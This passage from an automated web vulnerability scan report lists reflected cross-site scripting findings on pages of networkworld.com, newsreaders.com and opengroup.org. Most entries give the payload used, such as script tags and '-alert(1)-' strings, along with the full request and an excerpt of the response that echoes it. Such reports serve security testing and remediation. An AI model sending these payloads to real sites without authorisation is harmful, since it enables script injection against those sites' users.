Content-Length: 54336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns = "http://www.w3.org/1999/xhtml" xml:lang = "en" lang =
...[SNIP]...
ium: '(none)',
           nsdr_auth: 'no',
subtopicid: 0,
outerref: '(none)',
nwchannel: '(none)',
request_uri: '/community/blog/ebay-use-joomla-open-source-gluee7ae6'-alert(1)-'d4cd0158299',
doc_uri: '/community/index.php',
site: '(none)',
rxid: '(none)',
nodeid: '(none)'    
};
}();
var jq_nodeid = "(none)";
var jq_request_uri =
...[SNIP]...

4.1336. http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.networkworld.com
Path:   /community/blog/ebay-use-joomla-open-source-glue

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f64ea'-alert(1)-'4daf3508b09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /community/blog/ebay-use-joomla-open-source-glue?f64ea'-alert(1)-'4daf3508b09=1 HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
Cneonction: close
Content-Type: text/html; charset=utf-8
Expires: Tue, 25 Jan 2011 05:05:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 05:05:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=173.193.214.243.1295931913130479; path=/; expires=Thu, 24-Jan-13 05:05:13 GMT
Set-Cookie: SESSa27dc0841fd4d8567c009be96a283c67=psb6m4ok99kul7055oqd6e94g5; expires=Thu, 17-Feb-2011 08:38:33 GMT; path=/; domain=.networkworld.com
Content-Length: 95630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns = "http://www.w3.org/1999/xhtml" xml:lang = "en" lang = "en">
<head
...[SNIP]...
um: '(none)',
           nsdr_auth: 'no',
subtopicid: 0,
outerref: '(none)',
nwchannel: '(none)',
request_uri: '/community/blog/ebay-use-joomla-open-source-glue?f64ea'-alert(1)-'4daf3508b09=1',
doc_uri: '/community/index.php',
site: 'subnet_opensource',
rxid: '(none)',
nodeid: '(none)'    
};
}();
var jq_nodeid = "(none)";
var jq_r
...[SNIP]...

4.1337. http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.networkworld.com
Path:   /community/blog/ebay-use-joomla-open-source-glue

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10d36"><script>alert(1)</script>979ddc20d91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /community/blog/ebay-use-joomla-open-source-glue?10d36"><script>alert(1)</script>979ddc20d91=1 HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
Cneonction: close
Content-Type: text/html; charset=utf-8
Expires: Tue, 25 Jan 2011 05:04:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 05:04:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=173.193.214.243.1295931877094828; path=/; expires=Thu, 24-Jan-13 05:04:37 GMT
Set-Cookie: SESSa27dc0841fd4d8567c009be96a283c67=rbs8ae2t272o95ekh27bolvf66; expires=Thu, 17-Feb-2011 08:37:57 GMT; path=/; domain=.networkworld.com
Content-Length: 95917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns = "http://www.w3.org/1999/xhtml" xml:lang = "en" lang = "en">
<head
...[SNIP]...
<meta name="syndication-source" content="http://www.networkworld/community/blog/ebay-use-joomla-open-source-glue?10d36"><script>alert(1)</script>979ddc20d91=1" />
...[SNIP]...

4.1338. http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.networkworld.com
Path:   /news/2010/100710-ebay-deploys-joomla-for-analytics.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adb44'-alert(1)-'f4fbd266c3e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /newsadb44'-alert(1)-'f4fbd266c3e/2010/100710-ebay-deploys-joomla-for-analytics.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
nnCoection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=300
Date: Tue, 25 Jan 2011 05:06:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 75204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
pgtype: '(none)',
           subtopic: '',
           freemium: '(none)',
           nsdr_auth: 'no',
subtopicid: 0,
outerref: '(none)',
nwchannel: '(none)',
request_uri: '/newsadb44'-alert(1)-'f4fbd266c3e/2010/100710-ebay-deploys-joomla-for-analytics.html',
doc_uri: '/badlink.html',
site: 'general',
rxid: '(none)',
nodeid: '(none)'    
};
}();
va
...[SNIP]...

4.1339. http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.networkworld.com
Path:   /news/2010/100710-ebay-deploys-joomla-for-analytics.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc475'-alert(1)-'4d7477e29c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/2010dc475'-alert(1)-'4d7477e29c/100710-ebay-deploys-joomla-for-analytics.html HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
nnCoection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=300
Date: Tue, 25 Jan 2011 05:06:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 76793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
e: '(none)',
           subtopic: '',
           freemium: '(none)',
           nsdr_auth: 'no',
subtopicid: 0,
outerref: '(none)',
nwchannel: '(none)',
request_uri: '/news/2010dc475'-alert(1)-'4d7477e29c/100710-ebay-deploys-joomla-for-analytics.html',
doc_uri: '/badlink.html',
site: 'general',
rxid: '(none)',
nodeid: '(none)'    
};
}();
var jq_
...[SNIP]...

4.1340. http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.networkworld.com
Path:   /news/2010/100710-ebay-deploys-joomla-for-analytics.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f18f'-alert(1)-'8395c000953 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/2010/100710-ebay-deploys-joomla-for-analytics.html6f18f'-alert(1)-'8395c000953 HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
nnCoection: close
Content-Type: text/html; charset=UTF-8
Expires: Tue, 25 Jan 2011 05:07:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 05:07:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=173.193.214.243.1295932041394853; path=/; expires=Thu, 24-Jan-13 05:07:21 GMT
Content-Length: 75204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
one)',
           nsdr_auth: 'no',
subtopicid: 0,
outerref: '(none)',
nwchannel: '(none)',
request_uri: '/news/2010/100710-ebay-deploys-joomla-for-analytics.html6f18f'-alert(1)-'8395c000953',
doc_uri: '/badlink.html',
site: 'general',
rxid: '(none)',
nodeid: '(none)'    
};
}();
var jq_nodeid = "(none)";
var jq_request_uri = "/news
...[SNIP]...

4.1341. http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.networkworld.com
Path:   /news/2010/100710-ebay-deploys-joomla-for-analytics.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f45a'-alert(1)-'7a2e215cf42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/2010/100710-ebay-deploys-joomla-for-analytics.html?8f45a'-alert(1)-'7a2e215cf42=1 HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=300
Date: Tue, 25 Jan 2011 05:04:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
       nsdr_auth: 'no',
subtopicid: 0,
outerref: '(none)',
nwchannel: 'Network World',
request_uri: '/news/2010/100710-ebay-deploys-joomla-for-analytics.html?8f45a'-alert(1)-'7a2e215cf42=1',
doc_uri: '/news/2010/100710-ebay-deploys-joomla-for-analytics.html',
site: 'infrastructuremgmt',
rxid: '222588',
nodeid: ''    
};
}();
var
...[SNIP]...

4.1342. http://www.newsreaders.com/unix/utilities.html/x22 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsreaders.com
Path:   /unix/utilities.html/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74b10"><script>alert(1)</script>bdf3ff46ede was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /unix74b10"><script>alert(1)</script>bdf3ff46ede/utilities.html/x22 HTTP/1.1
Host: www.newsreaders.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:15:17 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 2738

<HTML><HEAD><TITLE>404 Error</TITLE></HEAD>
<BODY BGCOLOR = "white">


<!-- start header -->
<!-- Last changed 2000/07/21 -->
<!-- TITLE: X -->
<!-- COLOR: X -->
<CENTER><FONT SIZE = +2>an eMailman(sm
...[SNIP]...
<A HREF = "http://www.newsreaders.com/unix74b10"><script>alert(1)</script>bdf3ff46ede/utilities.html/x22">
...[SNIP]...

4.1343. http://www.newsreaders.com/unix/utilities.html/x22 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsreaders.com
Path:   /unix/utilities.html/x22

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f0b14<script>alert(1)</script>2328a49be9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /unixf0b14<script>alert(1)</script>2328a49be9a/utilities.html/x22 HTTP/1.1
Host: www.newsreaders.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:15:18 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 2734

<HTML><HEAD><TITLE>404 Error</TITLE></HEAD>
<BODY BGCOLOR = "white">


<!-- start header -->
<!-- Last changed 2000/07/21 -->
<!-- TITLE: X -->
<!-- COLOR: X -->
<CENTER><FONT SIZE = +2>an eMailman(sm
...[SNIP]...
</script>2328a49be9a/utilities.html/x22">&lt;http://www.newsreaders.com/unixf0b14<script>alert(1)</script>2328a49be9a/utilities.html/x22&gt;</A>
...[SNIP]...

4.1344. http://www.newsreaders.com/unix/utilities.html/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsreaders.com
Path:   /unix/utilities.html/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fed6"><script>alert(1)</script>254f42a5555 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /unix/utilities.html1fed6"><script>alert(1)</script>254f42a5555/x22 HTTP/1.1
Host: www.newsreaders.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:15:18 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 2738

<HTML><HEAD><TITLE>404 Error</TITLE></HEAD>
<BODY BGCOLOR = "white">


<!-- start header -->
<!-- Last changed 2000/07/21 -->
<!-- TITLE: X -->
<!-- COLOR: X -->
<CENTER><FONT SIZE = +2>an eMailman(sm
...[SNIP]...
<A HREF = "http://www.newsreaders.com/unix/utilities.html1fed6"><script>alert(1)</script>254f42a5555/x22">
...[SNIP]...

4.1345. http://www.newsreaders.com/unix/utilities.html/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsreaders.com
Path:   /unix/utilities.html/x22

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3d5dc<script>alert(1)</script>eb2a241fe88 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /unix/utilities.html3d5dc<script>alert(1)</script>eb2a241fe88/x22 HTTP/1.1
Host: www.newsreaders.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:15:18 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 2734

<HTML><HEAD><TITLE>404 Error</TITLE></HEAD>
<BODY BGCOLOR = "white">


<!-- start header -->
<!-- Last changed 2000/07/21 -->
<!-- TITLE: X -->
<!-- COLOR: X -->
<CENTER><FONT SIZE = +2>an eMailman(sm
...[SNIP]...
</script>eb2a241fe88/x22">&lt;http://www.newsreaders.com/unix/utilities.html3d5dc<script>alert(1)</script>eb2a241fe88/x22&gt;</A>
...[SNIP]...

4.1346. http://www.newsreaders.com/unix/utilities.html/x22 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsreaders.com
Path:   /unix/utilities.html/x22

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 12334<script>alert(1)</script>20ade9eea3f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /unix/utilities.html/x2212334<script>alert(1)</script>20ade9eea3f HTTP/1.1
Host: www.newsreaders.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:15:19 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 2734

<HTML><HEAD><TITLE>404 Error</TITLE></HEAD>
<BODY BGCOLOR = "white">


<!-- start header -->
<!-- Last changed 2000/07/21 -->
<!-- TITLE: X -->
<!-- COLOR: X -->
<CENTER><FONT SIZE = +2>an eMailman(sm
...[SNIP]...
</script>20ade9eea3f">&lt;http://www.newsreaders.com/unix/utilities.html/x2212334<script>alert(1)</script>20ade9eea3f&gt;</A>
...[SNIP]...

4.1347. http://www.newsreaders.com/unix/utilities.html/x22 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsreaders.com
Path:   /unix/utilities.html/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30fdf"><script>alert(1)</script>ddc8787967e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /unix/utilities.html/x2230fdf"><script>alert(1)</script>ddc8787967e HTTP/1.1
Host: www.newsreaders.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:15:19 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 2738

<HTML><HEAD><TITLE>404 Error</TITLE></HEAD>
<BODY BGCOLOR = "white">


<!-- start header -->
<!-- Last changed 2000/07/21 -->
<!-- TITLE: X -->
<!-- COLOR: X -->
<CENTER><FONT SIZE = +2>an eMailman(sm
...[SNIP]...
<A HREF = "http://www.newsreaders.com/unix/utilities.html/x2230fdf"><script>alert(1)</script>ddc8787967e">
...[SNIP]...

4.1348. http://www.opengroup.org/onlinepubs/009629399 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /onlinepubs/009629399

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5b448<script>alert(1)</script>a3a034f5075 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /onlinepubs5b448<script>alert(1)</script>a3a034f5075/009629399 HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 05:07:24 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4246

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/onlinepubs5b448<script>alert(1)</script>a3a034f5075/009629399<br>
...[SNIP]...

4.1349. http://www.opengroup.org/onlinepubs/009629399 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /onlinepubs/009629399

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 1cd1b--><script>alert(1)</script>613d39895d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /onlinepubs1cd1b--><script>alert(1)</script>613d39895d4/009629399 HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 05:07:29 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4252

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /onlinepubs1cd1b--><script>alert(1)</script>613d39895d4/009629399 -->
...[SNIP]...

4.1350. http://www.opengroup.org/onlinepubs/009629399 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /onlinepubs/009629399

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 5816a--><script>alert(1)</script>01ffb216b83 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /onlinepubs/0096293995816a--><script>alert(1)</script>01ffb216b83 HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 05:07:41 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4252

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /onlinepubs/0096293995816a--><script>alert(1)</script>01ffb216b83 -->
...[SNIP]...

4.1351. http://www.opengroup.org/onlinepubs/009629399 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /onlinepubs/009629399

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fa322<script>alert(1)</script>48ce99f4b48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /onlinepubs/009629399fa322<script>alert(1)</script>48ce99f4b48 HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 05:07:38 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4246

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/onlinepubs/009629399fa322<script>alert(1)</script>48ce99f4b48<br>
...[SNIP]...

4.1352. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /onlinepubs/009629399/apdxa.htm

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 5d81f--><script>alert(1)</script>1c7bb61d234 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /onlinepubs5d81f--><script>alert(1)</script>1c7bb61d234/009629399/apdxa.htm HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 05:05:46 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4272

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /onlinepubs5d81f--><script>alert(1)</script>1c7bb61d234/009629399/apdxa.htm -->
...[SNIP]...

4.1353. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /onlinepubs/009629399/apdxa.htm

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c1a01<script>alert(1)</script>5c075d42855 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /onlinepubsc1a01<script>alert(1)</script>5c075d42855/009629399/apdxa.htm HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 05:05:40 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4266

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/onlinepubsc1a01<script>alert(1)</script>5c075d42855/009629399/apdxa.htm<br>
...[SNIP]...

4.1354. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /onlinepubs/009629399/apdxa.htm

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 830c0<script>alert(1)</script>667d2a8885b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /onlinepubs/009629399830c0<script>alert(1)</script>667d2a8885b/apdxa.htm HTTP/1.1
Host: www.opengroup.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 05:06:07 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Connection: close
Content-Type: text/html
Content-Length: 4266

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/onlinepubs/009629399830c0<script>alert(1)</script>667d2a8885b/apdxa.htm<br>
...[SNIP]...

4.1355. http://www.opengroup.org/onlinepubs/009629399/apdxa.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /onlinepubs/009629399/apdxa.htm

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload ad8d0--><script>alert(1)</script>52643a8c339 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

